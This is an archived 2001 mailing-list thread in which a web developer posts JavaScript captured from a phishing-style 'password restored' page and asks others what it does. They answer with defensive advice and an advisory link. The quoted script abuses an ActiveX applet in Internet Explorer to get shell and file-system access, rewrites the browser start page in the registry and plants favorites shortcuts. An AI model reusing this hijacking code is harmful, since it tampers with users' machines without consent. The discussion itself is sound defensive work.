RE: Not so nice JS intruding on a computer without ones knowledge
by "Martin T. Hugo" <martyh(at)cinci.rr.com>
|
| Date: |
Sat, 11 Aug 2001 22:13:14 -0400 |
| To: |
"'Greger Lindberg'" <greger.lindberg(at)medhs.ki.se>,
"'Nancy Whittley'" <NWHITTLEY(at)cinci.rr.com> |
| Cc: |
"'Webmaster(at)kapnkreations.com'" <webmaster(at)kapnkreations.com>, "'Hwg-Techniques \(E-mail\)'" <hwg-techniques(at)hwg.org> |
| In-Reply-To: |
ki |
| |
todo: View
Thread,
Original
|
|
As far as I am aware, FCC regulations require that all ISPs have an
email address of abuse@ or at the very least postmaster@ to receive and
deal with complaints of this nature.
HTH
Marty
-----Original Message-----
From: owner-hwg-techniques(at)hwg.org [mailto:owner-hwg-techniques(at)hwg.org]
On Behalf Of Greger Lindberg
Sent: Saturday, August 11, 2001 12:41 PM
To: Nancy Whittley
Cc: Webmaster(at)kapnkreations.com; Hwg-Techniques (E-mail)
Subject: Re: Not so nice JS intruding on a computer without ones
knowledge
Could be something like that described at:
"http://www.guninski.com/javaea.html", i.e. someone trying to do things
with your computer. Greger
Nancy Whittley wrote:
> Yes I agree, I see the registry keys there. The script didn't do as=20
> it was designed. I have no favorites marked that way and It wasn't=20
> able to change my home page as I figure the script is attempting. =20
> However, I tracked down the site owner, the isp this is located on,
the isp from the email, and all
> that. I have never really actively pursued a spammer, but would like
to
> really go after this one.
>
> Anyone know how to do that? This is a nasty thing, and I think the
isp
> where the site is housed, should know. I am writing letters as we=20
> speak.
>
> Nancy
>
> Ouch! Those look frightfully like registry settings......(I am a Mac=20
> Developer so I apologize if my syntax is incorrect)! I tend to delete
> immediately anything that arrives from suspicious sources - not even=20
> previewing in the preview pane.
>
> I would run some serious diagnostics on your machine....anti-virus,=20
> some disk utilities, etc.
>
> --
> Blane Warrene
> Chief Technology Officer
> Kap`n Kreations | Internet Solutions
> cto(at)kapnkreations.com
> http://www.kapnkreations.com
>
> > From: "Nancy Whittley" <NWHITTLEY(at)cinci.rr.com>
> > Date: Fri, 10 Aug 2001 16:57:27 -0400
> > To: "Hwg-Techniques \(E-mail\)" <hwg-techniques(at)hwg.org>
> > Subject: Not so nice JS intruding on a computer without ones=20
> > knowledge
> >
> > Hello,
> >
> > I am curious. I got an email, and it had a simple message.. Your
> password
> > has been changed. To restore your password click here. Well I knew
> > it
> was
> > a trap of sorts, but to stay on top of things I went there any way.
> >
> > When I got there it was a blank page, that said your password has=20
> > been restored. Nothing esle. Website I have never seen before. In
> > viewing
> the
> > html, the page calls up a javascript.
> >
> > I captured the script below: Would someone please tell me what all=20
> > this thing has done? Obviously it is attempting to make changes to=20
> > my
> registry,
> > favorites folder, but what else has is it doing?
> > Thanks in Advance
> > Nancy
> > (I changed the two urls that it included to generics to use as=20
> > examples.
> I
> > had just had a friend experiece this and it is very angering for=20
> > me.)
> >
> > _________________________________________
> >
> > document.write("<APPLET HEIGHT=3D0 WIDTH=3D0
> > code=3Dcom.ms.activeX.ActiveXComponent></APPLET>")
> >
> >
> >
> > function AddFavLnk(loc, DispName, SiteURL)
> > {
> > var Shor =3D Shl.CreateShortcut(loc + "\\" + DispName +".URL");=20
> > Shor.TargetPath =3D SiteURL; Shor.Save();
> > }
> >
> > function f(){
> > try
> > {
> > a1=3Ddocument.applets[0];=20
> > a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
> > a1.createInstance();
> > Shl =3D a1.GetObject();=20
> > a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
> > a1.createInstance();
> > FSO =3D a1.GetObject();=20
> > a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
> > a1.createInstance();
> > Net =3D a1.GetObject();
> >
> > try{
> >
> > var expdate =3D new Date((new Date()).getTime() + (24 * 60 * 60 * =
1000
> > *
> 90));
> > document.cookie=3D"Chg=3Dgeneral; expires=3D" + =
expdate.toGMTString() + ";
> > path=3D/;"
> >
> >
> >
> //////////////////////////////////////////////////////////////////////
> //////
> > ///=D6=F7=D23
> >
> >
> > Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet=20
> > Explorer\\Main\\Start Page", "http://badwebsitename here/"); var=20
> > expdate =3D new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 *
> 90));
> > document.cookie=3D"Chg=3Dgeneral; expires=3D" + =
expdate.toGMTString() + ";
> > path=3D/;" var WF, Shor, loc;
> > WF =3D FSO.GetSpecialFolder(0);
> > loc =3D WF + "\\Favorites";
> >
> > if(!FSO.FolderExists(loc))
> > {
> > loc =3D FSO.GetDriveName(WF) + "\\Documents and Settings\\" +=20
> > Net.UserName + "\\Favorites";
> > if(!FSO.FolderExists(loc))
> > {
> > return;
> > }
> > }
> >
> >
> //////////////////////////////////////////////////////////////////////
> //////
> > ///=CA=D52=D8*?
> >
> >
> > AddFavLnk(loc, " Britney Spears Nude", "http://www.whatever.com");=20
> > AddFavLnk(loc, " Aol", "http://www.aol.com"); }
> > catch(e){ }
> > }
> > catch(e){ }
> > }
> > function init(){
> > setTimeout("f()", 1000);
> > }
> > init();
> > _______________________________________________
> >
HWG hwg-techniques mailing list archives,
maintained by Webmasters @ IWA